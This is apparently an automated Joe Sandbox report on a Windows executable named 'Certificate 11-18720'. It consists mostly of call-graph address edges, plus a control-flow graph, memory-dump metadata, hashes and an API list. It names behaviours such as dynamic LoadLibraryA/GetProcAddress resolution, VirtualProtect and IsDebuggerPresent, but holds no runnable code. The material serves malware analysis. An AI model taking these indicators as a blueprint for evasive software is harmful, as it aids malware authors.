92909->92910 92911 5c44ed 64 API calls 92910->92911 92912 60c442 92911->92912 92913 5c44ed 64 API calls 92912->92913 92914 60c45d 92913->92914 92915 5c44ed 64 API calls 92914->92915 92916 60c478 92915->92916 92917 5c4517 83 API calls 92916->92917 92918 60c48f 92917->92918 92919 5e395c _W_store_winword 47 API calls 92918->92919 92920 60c496 92919->92920 92921 5e395c _W_store_winword 47 API calls 92920->92921 92922 60c4a0 92921->92922 92923 5c44ed 64 API calls 92922->92923 92924 60c4b4 92923->92924 92925 
60bf5a GetSystemTimeAsFileTime 92924->92925 92926 60c4c7 92925->92926 92927 60c4f1 92926->92927 92928 60c4dc 92926->92928 92930 60c556 92927->92930 92931 60c4f7 92927->92931 92929 5e1c9d _free 47 API calls 92928->92929 92932 60c4e2 92929->92932 92934 5e1c9d _free 47 API calls 92930->92934 93176 60b965 92931->93176 92936 5e1c9d _free 47 API calls 92932->92936 92935 60c41b 92934->92935 92935->92783 92939 5c4252 92935->92939 92936->92935 92938 5e1c9d _free 47 API calls 92938->92935 92940 5c425c 92939->92940 92941 5c4263 92939->92941 92942 5e35e4 __fcloseall 83 API calls 92940->92942 92943 5c4272 92941->92943 92944 5c4283 FreeLibrary 92941->92944 92942->92941 92943->92783 92944->92943 92994 5c4339 92945->92994 92947 5c423c 92950 5c41bb 92947->92950 92951 5c4244 FreeLibrary 92947->92951 92952 5e3499 92950->92952 92951->92950 93002 5e34ae 92952->93002 92954 5c41c8 92954->92885 92954->92886 93081 5c42e4 92955->93081 92958 5c42b8 92959 5c41ec 92958->92959 92960 5c42c1 FreeLibrary 92958->92960 92962 5c4380 92959->92962 92960->92959 92963 5df4ea 48 API calls 92962->92963 92964 5c4395 92963->92964 93089 5c47b7 92964->93089 92966 5c43a1 ___crtGetEnvironmentStringsW 92967 5c43dc 92966->92967 92968 5c4499 92966->92968 92969 5c44d1 92966->92969 92970 5c4950 57 API calls 92967->92970 93092 5c406b CreateStreamOnHGlobal 92968->93092 93103 60c750 93 API calls 92969->93103 92978 5c43e5 92970->92978 92973 5c44ed 64 API calls 92973->92978 92974 5c4479 92974->92894 92976 634ed7 92977 5c4517 83 API calls 92976->92977 92979 634eeb 92977->92979 92978->92973 92978->92974 92978->92976 93098 5c4517 92978->93098 92980 5c44ed 64 API calls 92979->92980 92980->92974 92982 634fc0 92981->92982 92983 5c44ff 92981->92983 93127 5e381e 92983->93127 92986 60bf5a 93147 60bdb4 92986->93147 92988 60bf70 92988->92901 92990 635002 92989->92990 92991 5c495f 92989->92991 93152 5e3e65 92991->93152 92993 5c4967 92993->92903 92998 5c434b 92994->92998 92997 5c4321 LoadLibraryA GetProcAddress 92997->92947 92999 
5c422f 92998->92999 93000 5c4354 LoadLibraryA 92998->93000 92999->92947 92999->92997 93000->92999 93001 5c4365 GetProcAddress 93000->93001 93001->92999 93005 5e34ba __getstream 93002->93005 93003 5e34cd 93050 5e7c0e 47 API calls __getptd_noexit 93003->93050 93005->93003 93007 5e34fe 93005->93007 93006 5e34d2 93051 5e6e10 8 API calls __beginthread 93006->93051 93021 5ee4c8 93007->93021 93010 5e3503 93011 5e350c 93010->93011 93012 5e3519 93010->93012 93052 5e7c0e 47 API calls __getptd_noexit 93011->93052 93014 5e3543 93012->93014 93015 5e3523 93012->93015 93035 5ee5e0 93014->93035 93053 5e7c0e 47 API calls __getptd_noexit 93015->93053 93016 5e34dd @_EH4_CallFilterFunc@8 __getstream 93016->92954 93022 5ee4d4 __getstream 93021->93022 93023 5e7cf4 __lock 47 API calls 93022->93023 93033 5ee4e2 93023->93033 93024 5ee552 93055 5ee5d7 93024->93055 93025 5ee559 93060 5e69d0 47 API calls _W_store_winword 93025->93060 93028 5ee560 93028->93024 93030 5ee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93028->93030 93029 5ee5cc __getstream 93029->93010 93030->93024 93031 5e7d7c __mtinitlocknum 47 API calls 93031->93033 93033->93024 93033->93025 93033->93031 93058 5e4e5b 48 API calls __lock 93033->93058 93059 5e4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93033->93059 93037 5ee600 __wopenfile 93035->93037 93036 5ee61a 93065 5e7c0e 47 API calls __getptd_noexit 93036->93065 93037->93036 93049 5ee7d5 93037->93049 93067 5e185b 59 API calls 2 library calls 93037->93067 93039 5ee61f 93066 5e6e10 8 API calls __beginthread 93039->93066 93041 5ee838 93062 5f63c9 93041->93062 93042 5e354e 93054 5e3570 LeaveCriticalSection LeaveCriticalSection _fprintf 93042->93054 93045 5ee7ce 93045->93049 93068 5e185b 59 API calls 2 library calls 93045->93068 93047 5ee7ed 93047->93049 93069 5e185b 59 API calls 2 library calls 93047->93069 93049->93036 93049->93041 93050->93006 93051->93016 93052->93016 93053->93016 93054->93016 93061 5e7e58 LeaveCriticalSection 93055->93061 93057 
5ee5de 93057->93029 93058->93033 93059->93033 93060->93028 93061->93057 93070 5f5bb1 93062->93070 93064 5f63e2 93064->93042 93065->93039 93066->93042 93067->93045 93068->93047 93069->93049 93071 5f5bbd __getstream 93070->93071 93072 5f5bcf 93071->93072 93075 5f5c06 93071->93075 93073 5e7c0e __beginthread 47 API calls 93072->93073 93074 5f5bd4 93073->93074 93076 5e6e10 __beginthread 8 API calls 93074->93076 93077 5f5c78 __wsopen_helper 110 API calls 93075->93077 93080 5f5bde __getstream 93076->93080 93078 5f5c23 93077->93078 93079 5f5c4c __wsopen_helper LeaveCriticalSection 93078->93079 93079->93080 93080->93064 93085 5c42f6 93081->93085 93084 5c42cc LoadLibraryA GetProcAddress 93084->92958 93086 5c42aa 93085->93086 93087 5c42ff LoadLibraryA 93085->93087 93086->92958 93086->93084 93087->93086 93088 5c4310 GetProcAddress 93087->93088 93088->93086 93090 5df4ea 48 API calls 93089->93090 93091 5c47c9 93090->93091 93091->92966 93093 5c4085 FindResourceExW 93092->93093 93097 5c40a2 93092->93097 93094 634f16 LoadResource 93093->93094 93093->93097 93095 634f2b SizeofResource 93094->93095 93094->93097 93096 634f3f LockResource 93095->93096 93095->93097 93096->93097 93097->92967 93099 634fe0 93098->93099 93100 5c4526 93098->93100 93104 5e3a8d 93100->93104 93102 5c4534 93102->92978 93103->92967 93107 5e3a99 __getstream 93104->93107 93105 5e3aa7 93117 5e7c0e 47 API calls __getptd_noexit 93105->93117 93106 5e3acd 93119 5e4e1c 93106->93119 93107->93105 93107->93106 93109 5e3aac 93118 5e6e10 8 API calls __beginthread 93109->93118 93112 5e3ad3 93125 5e39fe 81 API calls 5 library calls 93112->93125 93114 5e3ae2 93126 5e3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93114->93126 93116 5e3ab7 __getstream 93116->93102 93117->93109 93118->93116 93120 5e4e4e EnterCriticalSection 93119->93120 93121 5e4e2c 93119->93121 93123 5e4e44 93120->93123 93121->93120 93122 5e4e34 93121->93122 93124 5e7cf4 __lock 47 API calls 93122->93124 93123->93112 93124->93123 93125->93114 93126->93116 
93130 5e3839 93127->93130 93129 5c4510 93129->92986 93131 5e3845 __getstream 93130->93131 93132 5e3888 93131->93132 93133 5e3880 __getstream 93131->93133 93135 5e385b _memset 93131->93135 93134 5e4e1c __lock_file 48 API calls 93132->93134 93133->93129 93137 5e388e 93134->93137 93143 5e7c0e 47 API calls __getptd_noexit 93135->93143 93145 5e365b 62 API calls 5 library calls 93137->93145 93139 5e3875 93144 5e6e10 8 API calls __beginthread 93139->93144 93140 5e38a4 93146 5e38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93140->93146 93143->93139 93144->93133 93145->93140 93146->93133 93150 5e344a GetSystemTimeAsFileTime 93147->93150 93149 60bdc3 93149->92988 93151 5e3478 __aulldiv 93150->93151 93151->93149 93153 5e3e71 __getstream 93152->93153 93154 5e3e7f 93153->93154 93155 5e3e94 93153->93155 93166 5e7c0e 47 API calls __getptd_noexit 93154->93166 93157 5e4e1c __lock_file 48 API calls 93155->93157 93159 5e3e9a 93157->93159 93158 5e3e84 93167 5e6e10 8 API calls __beginthread 93158->93167 93168 5e3b0c 55 API calls 6 library calls 93159->93168 93162 5e3ea5 93169 5e3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93162->93169 93164 5e3eb7 93165 5e3e8f __getstream 93164->93165 93165->92993 93166->93158 93167->93165 93168->93162 93169->93164 93171 60c581 __tzset_nolock _wcscmp 93170->93171 93172 5c44ed 64 API calls 93171->93172 93173 60c417 93171->93173 93174 60bf5a GetSystemTimeAsFileTime 93171->93174 93175 5c4517 83 API calls 93171->93175 93172->93171 93173->92909 93173->92935 93174->93171 93175->93171 93177 60b970 93176->93177 93178 60b97e 93176->93178 93179 5e3499 117 API calls 93177->93179 93180 60b9c3 93178->93180 93181 5e3499 117 API calls 93178->93181 93192 60b987 93178->93192 93179->93178 93207 60bbe8 64 API calls 3 library calls 93180->93207 93183 60b9a8 93181->93183 93183->93180 93185 60b9b1 93183->93185 93184 60ba07 93186 60ba0b 93184->93186 93187 60ba2c 93184->93187 93185->93192 93218 5e35e4 93185->93218 93188 60ba18 93186->93188 93191 5e35e4 
__fcloseall 83 API calls 93186->93191 93208 60b7e5 47 API calls _W_store_winword 93187->93208 93188->93192 93196 5e35e4 __fcloseall 83 API calls 93188->93196 93191->93188 93192->92938 93193 60ba34 93194 60ba5a 93193->93194 93195 60ba3a 93193->93195 93209 60ba8a 90 API calls 93194->93209 93197 60ba47 93195->93197 93199 5e35e4 __fcloseall 83 API calls 93195->93199 93196->93192 93197->93192 93201 5e35e4 __fcloseall 83 API calls 93197->93201 93199->93197 93200 60ba61 93210 60bb64 93200->93210 93201->93192 93204 60ba75 93204->93192 93206 5e35e4 __fcloseall 83 API calls 93204->93206 93205 5e35e4 __fcloseall 83 API calls 93205->93204 93206->93192 93207->93184 93208->93193 93209->93200 93211 60bb71 93210->93211 93213 60bb77 93210->93213 93212 5e1c9d _free 47 API calls 93211->93212 93212->93213 93214 60bb88 93213->93214 93215 5e1c9d _free 47 API calls 93213->93215 93216 60ba68 93214->93216 93217 5e1c9d _free 47 API calls 93214->93217 93215->93214 93216->93204 93216->93205 93217->93216 93219 5e35f0 __getstream 93218->93219 93220 5e361c 93219->93220 93221 5e3604 93219->93221 93223 5e4e1c __lock_file 48 API calls 93220->93223 93228 5e3614 __getstream 93220->93228 93247 5e7c0e 47 API calls __getptd_noexit 93221->93247 93225 5e362e 93223->93225 93224 5e3609 93248 5e6e10 8 API calls __beginthread 93224->93248 93231 5e3578 93225->93231 93228->93192 93232 5e3587 93231->93232 93235 5e359b 93231->93235 93290 5e7c0e 47 API calls __getptd_noexit 93232->93290 93234 5e3597 93249 5e3653 LeaveCriticalSection LeaveCriticalSection _fprintf 93234->93249 93235->93234 93250 5e2c84 93235->93250 93236 5e358c 93291 5e6e10 8 API calls __beginthread 93236->93291 93243 5e35b5 93267 5ee9d2 93243->93267 93245 5e35bb 93245->93234 93246 5e1c9d _free 47 API calls 93245->93246 93246->93234 93247->93224 93248->93228 93249->93228 93251 5e2c97 93250->93251 93255 5e2cbb 93250->93255 93252 5e2933 __stbuf 47 API calls 93251->93252 93251->93255 93253 5e2cb4 93252->93253 93292 5eaf61 93253->93292 93256 5eeb36 
93255->93256 93257 5e35af 93256->93257 93258 5eeb43 93256->93258 93260 5e2933 93257->93260 93258->93257 93259 5e1c9d _free 47 API calls 93258->93259 93259->93257 93261 5e293d 93260->93261 93262 5e2952 93260->93262 93317 5e7c0e 47 API calls __getptd_noexit 93261->93317 93262->93243 93264 5e2942 93318 5e6e10 8 API calls __beginthread 93264->93318 93266 5e294d 93266->93243 93268 5ee9de __getstream 93267->93268 93269 5ee9fe 93268->93269 93270 5ee9e6 93268->93270 93271 5eea7b 93269->93271 93276 5eea28 93269->93276 93343 5e7bda 47 API calls __getptd_noexit 93270->93343 93347 5e7bda 47 API calls __getptd_noexit 93271->93347 93273 5ee9eb 93344 5e7c0e 47 API calls __getptd_noexit 93273->93344 93275 5eea80 93348 5e7c0e 47 API calls __getptd_noexit 93275->93348 93319 5ea8ed 93276->93319 93280 5eea88 93349 5e6e10 8 API calls __beginthread 93280->93349 93281 5eea2e 93283 5eea4c 93281->93283 93284 5eea41 93281->93284 93345 5e7c0e 47 API calls __getptd_noexit 93283->93345 93328 5eea9c 93284->93328 93286 5ee9f3 __getstream 93286->93245 93288 5eea47 93346 5eea73 LeaveCriticalSection __unlock_fhandle 93288->93346 93290->93236 93291->93234 93293 5eaf6d __getstream 93292->93293 93294 5eaf8d 93293->93294 93295 5eaf75 93293->93295 93297 5eb022 93294->93297 93301 5eafbf 93294->93301 93296 5e7bda __set_osfhnd 47 API calls 93295->93296 93298 5eaf7a 93296->93298 93299 5e7bda __set_osfhnd 47 API calls 93297->93299 93300 5e7c0e __beginthread 47 API calls 93298->93300 93302 5eb027 93299->93302 93313 5eaf82 __getstream 93300->93313 93303 5ea8ed ___lock_fhandle 49 API calls 93301->93303 93304 5e7c0e __beginthread 47 API calls 93302->93304 93305 5eafc5 93303->93305 93306 5eb02f 93304->93306 93307 5eafeb 93305->93307 93308 5eafd8 93305->93308 93309 5e6e10 __beginthread 8 API calls 93306->93309 93311 5e7c0e __beginthread 47 API calls 93307->93311 93310 5eb043 __chsize_nolock 75 API calls 93308->93310 93309->93313 93312 5eafe4 93310->93312 93314 5eaff0 93311->93314 93316 5eb01a __flush 
LeaveCriticalSection 93312->93316 93313->93255 93315 5e7bda __set_osfhnd 47 API calls 93314->93315 93315->93312 93316->93313 93317->93264 93318->93266 93320 5ea8f9 __getstream 93319->93320 93321 5ea946 EnterCriticalSection 93320->93321 93322 5e7cf4 __lock 47 API calls 93320->93322 93323 5ea96c __getstream 93321->93323 93324 5ea91d 93322->93324 93323->93281 93325 5ea93a 93324->93325 93326 5ea928 InitializeCriticalSectionAndSpinCount 93324->93326 93327 5ea970 ___lock_fhandle LeaveCriticalSection 93325->93327 93326->93325 93327->93321 93329 5eaba4 __lseeki64_nolock 47 API calls 93328->93329 93331 5eeaaa 93329->93331 93330 5eeb00 93333 5eab1e __free_osfhnd 48 API calls 93330->93333 93331->93330 93332 5eeade 93331->93332 93335 5eaba4 __lseeki64_nolock 47 API calls 93331->93335 93332->93330 93336 5eaba4 __lseeki64_nolock 47 API calls 93332->93336 93334 5eeb08 93333->93334 93337 5eeb2a 93334->93337 93340 5e7bed __dosmaperr 47 API calls 93334->93340 93338 5eead5 93335->93338 93339 5eeaea CloseHandle 93336->93339 93337->93288 93341 5eaba4 __lseeki64_nolock 47 API calls 93338->93341 93339->93330 93342 5eeaf6 GetLastError 93339->93342 93340->93337 93341->93332 93342->93330 93343->93273 93344->93286 93345->93288 93346->93286 93347->93275 93348->93280 93349->93286 93350->92791 93351->92798 93352->92808 93353->92808 93354->92809 93355->92822 93356->92824 93357->92821 93358->92829 93359->92830 93360->92849 93361->92847 93421 5ef8a0 93362->93421 93365 5c6a63 48 API calls 93366 5c6643 93365->93366 93423 5c6571 93366->93423 93369 5c40a7 93370 5ef8a0 __ftell_nolock 93369->93370 93371 5c40b4 GetLongPathNameW 93370->93371 93372 5c6a63 48 API calls 93371->93372 93373 5c40dc 93372->93373 93374 5c49a0 93373->93374 93375 5cd7f7 48 API calls 93374->93375 93376 5c49b2 93375->93376 93377 5c660f 49 API calls 93376->93377 93378 5c49bd 93377->93378 93379 5c49c8 93378->93379 93380 632e35 93378->93380 93381 5c64cf 48 API calls 93379->93381 93384 632e4f 93380->93384 93437 5dd35e 60 API calls 
93380->93437 93383 5c49d4 93381->93383 93431 5c28a6 93383->93431 93386 5c49e7 Mailbox 93386->92585 93388 5c41a9 136 API calls 93387->93388 93389 5c415e 93388->93389 93390 633489 93389->93390 93392 5c41a9 136 API calls 93389->93392 93391 60c396 122 API calls 93390->93391 93393 63349e 93391->93393 93394 5c4172 93392->93394 93395 6334a2 93393->93395 93396 6334bf 93393->93396 93394->93390 93397 5c417a 93394->93397 93398 5c4252 84 API calls 93395->93398 93399 5df4ea 48 API calls 93396->93399 93400 6334aa 93397->93400 93401 5c4186 93397->93401 93398->93400 93420 633504 Mailbox 93399->93420 93525 606b49 87 API calls _wprintf 93400->93525 93438 5cc833 93401->93438 93405 6334b8 93405->93396 93406 6336b4 93407 5e1c9d _free 47 API calls 93406->93407 93408 6336bc 93407->93408 93409 5c4252 84 API calls 93408->93409 93414 6336c5 93409->93414 93413 5e1c9d _free 47 API calls 93413->93414 93414->93413 93416 5c4252 84 API calls 93414->93416 93531 6025b5 86 API calls 4 library calls 93414->93531 93416->93414 93417 5cce19 48 API calls 93417->93420 93420->93406 93420->93414 93420->93417 93526 602551 48 API calls ___crtGetEnvironmentStringsW 93420->93526 93527 602472 60 API calls 2 library calls 93420->93527 93528 609c12 48 API calls 93420->93528 93529 5cba85 48 API calls ___crtGetEnvironmentStringsW 93420->93529 93530 5c4dd9 48 API calls 93420->93530 93422 5c661c GetFullPathNameW 93421->93422 93422->93365 93424 5c657f 93423->93424 93427 5cb18b 93424->93427 93426 5c4114 93426->93369 93428 5cb1a2 ___crtGetEnvironmentStringsW 93427->93428 93429 5cb199 93427->93429 93428->93426 93429->93428 93430 5cbdfa 48 API calls 93429->93430 93430->93428 93432 5c28b8 93431->93432 93436 5c28d7 ___crtGetEnvironmentStringsW 93431->93436 93435 5df4ea 48 API calls 93432->93435 93433 5df4ea 48 API calls 93434 5c28ee 93433->93434 93434->93386 93435->93436 93436->93433 93437->93380 93439 5cc843 __ftell_nolock 93438->93439 93440 633095 93439->93440 93441 5cc860 93439->93441 93556 6025b5 86 API calls 4 library 
calls 93440->93556 93537 5c48ba 49 API calls 93441->93537 93444 6330a8 93557 6025b5 86 API calls 4 library calls 93444->93557 93445 5cc882 93538 5c4550 56 API calls 93445->93538 93447 5cc897 93447->93444 93449 5cc89f 93447->93449 93451 5cd7f7 48 API calls 93449->93451 93450 6330c4 93454 5cc90c 93450->93454 93452 5cc8ab 93451->93452 93539 5de968 49 API calls __ftell_nolock 93452->93539 93456 6330d7 93454->93456 93457 5cc91a 93454->93457 93455 5cc8b7 93458 5cd7f7 48 API calls 93455->93458 93460 5c4907 CloseHandle 93456->93460 93542 5e1dfc 93457->93542 93462 5cc8c3 93458->93462 93461 6330e3 93460->93461 93463 5c41a9 136 API calls 93461->93463 93464 5c660f 49 API calls 93462->93464 93465 63310d 93463->93465 93466 5cc8d1 93464->93466 93468 633136 93465->93468 93471 60c396 122 API calls 93465->93471 93540 5deb66 SetFilePointerEx ReadFile 93466->93540 93467 5cc943 _wcscat _wcscpy 93470 5cc96d SetCurrentDirectoryW 93467->93470 93558 6025b5 86 API calls 4 library calls 93468->93558 93474 5df4ea 48 API calls 93470->93474 93475 633129 93471->93475 93472 5cc8fd 93541 5c46ce SetFilePointerEx SetFilePointerEx 93472->93541 93477 5cc988 93474->93477 93478 633152 93475->93478 93479 633131 93475->93479 93480 5c47b7 48 API calls 93477->93480 93482 5c4252 84 API calls 93478->93482 93481 5c4252 84 API calls 93479->93481 93513 5cc993 Mailbox __NMSG_WRITE 93480->93513 93481->93468 93483 633157 93482->93483 93484 5df4ea 48 API calls 93483->93484 93491 633194 93484->93491 93485 5cca9d 93552 5c4907 93485->93552 93489 5ccaa9 SetCurrentDirectoryW 93511 5ccad1 Mailbox 93489->93511 93490 5c3d98 93490->92446 93490->92455 93559 5cba85 48 API calls ___crtGetEnvironmentStringsW 93491->93559 93495 6333ce 93565 609b72 48 API calls 93495->93565 93496 633467 93569 6025b5 86 API calls 4 library calls 93496->93569 93499 633480 93499->93485 93501 6333f0 93566 6229e8 48 API calls ___crtGetEnvironmentStringsW 93501->93566 93503 6333fd 93506 5e1c9d _free 47 API calls 93503->93506 93505 63345f 93568 60240b 48 
API calls 3 library calls 93505->93568 93506->93511 93507 5cce19 48 API calls 93507->93513 93532 5c48dd 93511->93532 93513->93485 93513->93496 93513->93505 93513->93507 93545 5cb337 56 API calls _wcscpy 93513->93545 93546 5dc258 GetStringTypeW 93513->93546 93547 5ccb93 59 API calls __wcsnicmp 93513->93547 93548 5ccb5a GetStringTypeW __NMSG_WRITE 93513->93548 93549 5e16d0 GetStringTypeW __wtof_l 93513->93549 93550 5ccc24 162 API calls 3 library calls 93513->93550 93551 5dc682 48 API calls 93513->93551 93516 5cce19 48 API calls 93522 6331dd Mailbox 93516->93522 93519 633420 93567 6025b5 86 API calls 4 library calls 93519->93567 93521 633439 93523 5e1c9d _free 47 API calls 93521->93523 93522->93495 93522->93516 93522->93519 93560 602551 48 API calls ___crtGetEnvironmentStringsW 93522->93560 93561 602472 60 API calls 2 library calls 93522->93561 93562 609c12 48 API calls 93522->93562 93563 5cba85 48 API calls ___crtGetEnvironmentStringsW 93522->93563 93564 5dc682 48 API calls 93522->93564 93524 63314d 93523->93524 93524->93511 93525->93405 93526->93420 93527->93420 93528->93420 93529->93420 93530->93420 93531->93414 93533 5c4907 CloseHandle 93532->93533 93534 5c48e5 Mailbox 93533->93534 93535 5c4907 CloseHandle 93534->93535 93536 5c48fc 93535->93536 93536->93490 93537->93445 93538->93447 93539->93455 93540->93472 93541->93454 93570 5e1e46 93542->93570 93545->93513 93546->93513 93547->93513 93548->93513 93549->93513 93550->93513 93551->93513 93553 5c4920 93552->93553 93554 5c4911 93552->93554 93553->93554 93555 5c4925 CloseHandle 93553->93555 93554->93489 93555->93554 93556->93444 93557->93450 93558->93524 93559->93522 93560->93522 93561->93522 93562->93522 93563->93522 93564->93522 93565->93501 93566->93503 93567->93521 93568->93496 93569->93499 93571 5e1e55 93570->93571 93572 5e1e61 93570->93572 93571->93572 93584 5e1ed4 93571->93584 93589 5e9d6b 47 API calls __beginthread 93571->93589 93594 5e7c0e 47 API calls __getptd_noexit 93572->93594 93574 5e2019 93578 5e1e41 
93574->93578 93595 5e6e10 8 API calls __beginthread 93574->93595 93577 5e1fa0 93577->93572 93577->93578 93580 5e1fb0 93577->93580 93578->93467 93579 5e1f5f 93579->93572 93581 5e1f7b 93579->93581 93591 5e9d6b 47 API calls __beginthread 93579->93591 93593 5e9d6b 47 API calls __beginthread 93580->93593 93581->93572 93581->93578 93583 5e1f91 93581->93583 93592 5e9d6b 47 API calls __beginthread 93583->93592 93584->93572 93588 5e1f41 93584->93588 93590 5e9d6b 47 API calls __beginthread 93584->93590 93588->93577 93588->93579 93589->93584 93590->93588 93591->93581 93592->93578 93593->93578 93594->93574 93595->93578 93597 5df4ea 48 API calls 93596->93597 93598 5c6b54 93597->93598 93598->92596 93599->92597 93601 5c4c8b 93600->93601 93602 5c4d94 93600->93602 93601->93602 93603 5df4ea 48 API calls 93601->93603 93602->92602 93604 5c4cb2 93603->93604 93605 5df4ea 48 API calls 93604->93605 93606 5c4d22 93605->93606 93606->93602 93613 5cb470 93606->93613 93641 5c4dd9 48 API calls 93606->93641 93642 609af1 48 API calls 93606->93642 93643 5cba85 48 API calls ___crtGetEnvironmentStringsW 93606->93643 93611->92605 93612->92607 93644 5c6b0f 93613->93644 93615 5cb69b 93656 5cba85 48 API calls ___crtGetEnvironmentStringsW 93615->93656 93617 5cb6b5 Mailbox 93617->93606 93620 5cb495 93620->93615 93621 633939 ___crtGetEnvironmentStringsW 93620->93621 93622 5cbcce 48 API calls 93620->93622 93623 63397b 93620->93623 93626 5cb9e4 93620->93626 93629 5cba85 48 API calls 93620->93629 93633 633909 93620->93633 93638 5cbdfa 48 API calls 93620->93638 93649 5cc413 59 API calls 93620->93649 93650 5cbb85 93620->93650 93655 5cbc74 48 API calls 93620->93655 93657 5cc6a5 49 API calls 93620->93657 93658 5cc799 93620->93658 93666 6026bc 88 API calls 4 library calls 93621->93666 93622->93620 93667 6026bc 88 API calls 4 library calls 93623->93667 93669 6026bc 88 API calls 4 library calls 93626->93669 93627 633973 93627->93617 93629->93620 93631 633989 93668 5cba85 48 API calls ___crtGetEnvironmentStringsW 
93631->93668 93635 5c6b4a 48 API calls 93633->93635 93637 633914 93635->93637 93640 5df4ea 48 API calls 93637->93640 93639 5cb66c CharUpperBuffW 93638->93639 93639->93620 93640->93621 93641->93606 93642->93606 93643->93606 93645 5df4ea 48 API calls 93644->93645 93646 5c6b34 93645->93646 93647 5c6b4a 48 API calls 93646->93647 93648 5c6b43 93647->93648 93648->93620 93649->93620 93652 5cbb9b 93650->93652 93654 5cbb96 ___crtGetEnvironmentStringsW 93650->93654 93651 631b77 93652->93651 93653 5dee75 48 API calls 93652->93653 93653->93654 93654->93620 93655->93620 93656->93617 93657->93620 93659 631f17 93658->93659 93662 5cc7b0 93658->93662 93660 5c6b4a 48 API calls 93659->93660 93661 631f21 93660->93661 93664 5df4ea 48 API calls 93661->93664 93663 5cc7bd ___crtGetEnvironmentStringsW 93662->93663 93665 5dee75 48 API calls 93662->93665 93663->93620 93664->93663 93665->93663 93666->93627 93667->93631 93668->93627 93669->93627 93671 5c403c LoadImageW 93670->93671 93672 63418d EnumResourceNamesW 93670->93672 93673 5c3ee1 RegisterClassExW 93671->93673 93672->93673 93674 5c3f53 7 API calls 93673->93674 93674->92621 93676 633c33 93675->93676 93677 5c4c44 93675->93677 93676->93677 93678 633c3c DestroyIcon 93676->93678 93677->92627 93701 605819 61 API calls _W_store_winword 93677->93701 93678->93677 93680 5c51cb 93679->93680 93681 5c52a2 Mailbox 93679->93681 93682 5c6b0f 48 API calls 93680->93682 93681->92632 93683 5c51d9 93682->93683 93684 633ca1 LoadStringW 93683->93684 93685 5c51e6 93683->93685 93688 633cbb 93684->93688 93686 5c6a63 48 API calls 93685->93686 93687 5c51fb 93686->93687 93687->93688 93689 5c520c 93687->93689 93690 5c510d 48 API calls 93688->93690 93691 5c5216 93689->93691 93692 5c52a7 93689->93692 93695 633cc5 93690->93695 93693 5c510d 48 API calls 93691->93693 93694 5c6eed 48 API calls 93692->93694 93698 5c5220 _memset _wcscpy 93693->93698 93694->93698 93696 5c518c 48 API calls 93695->93696 93695->93698 93697 633ce7 93696->93697 93700 5c518c 48 API calls 
[Call graph: the original page renders an interactive call graph here; only its text export survives. The export is a whitespace-separated stream of edges of the form `src->dst` and node entries of the form `<node id> <address> [label]`, where the label is a Windows API name, an `N API calls` / `N library calls` count, a C-runtime symbol tag (e.g. `_wcscpy`, `_memset`, `__cinit`, `___crtGetEnvironmentStringsW`) or the Joe Sandbox tag `Mailbox`. Windows API names that appear on graph nodes: CharLowerBuffW, CharUpperBuffW, CloseHandle, CoInitialize, CreatePopupMenu, CreateThread, DefWindowProcW, DeleteObject, DestroyWindow, FindClose, FindFirstFileW, FreeLibrary, GetClassLongW, GetCurrentProcess, GetFileAttributesW, GetFullPathNameW, GetNativeSystemInfo, GetPEB, GetProcAddress, GetStdHandle, GetSystemInfo, GetVersionExW, InterlockedDecrement, IsDialogMessageW, KillTimer, LoadLibraryA, MoveWindow, PostQuitMessage, RegCloseKey, RegisterWindowMessageW, RegOpenKeyExW, RegQueryValueExW, SetFocus, SetTimer, Shell_NotifyIconW, Sleep, TerminateProcess, TranslateAcceleratorW, VirtualProtect. Node 94315 (5ddf5f) names LoadLibraryA and GetProcAddress together, and node 94318 (5ddf92, LoadLibraryA) leads directly to node 94319 (5ddfa3, GetProcAddress); node 94853 (61fbee) names GetCurrentProcess and TerminateProcess; node 94894 (5dedc5) names VirtualProtect.]

                                                                                    Control-flow Graph

Legend: Executed / Not Executed (the colouring is not preserved in the text export).
[Control-flow graph of the function at 5eb043-5eb86c: basic blocks keyed by address range, with edges `src->dst`. API calls named in its blocks: WriteFile, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, GetLastError. Internal calls: 5ef8a0, 5ea70c, 5e7bda, 5e7c0e, 5e6e10, 5f3bf2, 5ef82f, 5e7a0d, 5e7bed, 5e1688, 5f40f7, 5f5884.]
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d4da835d63964f8ab9d7abcc1d7aafe8d435339d8f35dbe5ca03aefd96896cd
                                                                                    • Instruction ID: 02198267bdec78838112f17985e3b80bbce3d61de20577e7c6e2ba67d4639314
                                                                                    • Opcode Fuzzy Hash: 4d4da835d63964f8ab9d7abcc1d7aafe8d435339d8f35dbe5ca03aefd96896cd
                                                                                    • Instruction Fuzzy Hash: A1329F75B022698BEB28CF15DC856EABBB5FF46311F0441D9E44AE7A81D7309E80CF52

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005C3AA3,?), ref: 005C3D45
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,005C3AA3,?), ref: 005C3D57
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00681148,00681130,?,?,?,?,005C3AA3,?), ref: 005C3DC8
                                                                                      • Part of subcall function 005C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005C3DEE,00681148,?,?,?,?,?,005C3AA3,?), ref: 005C6471
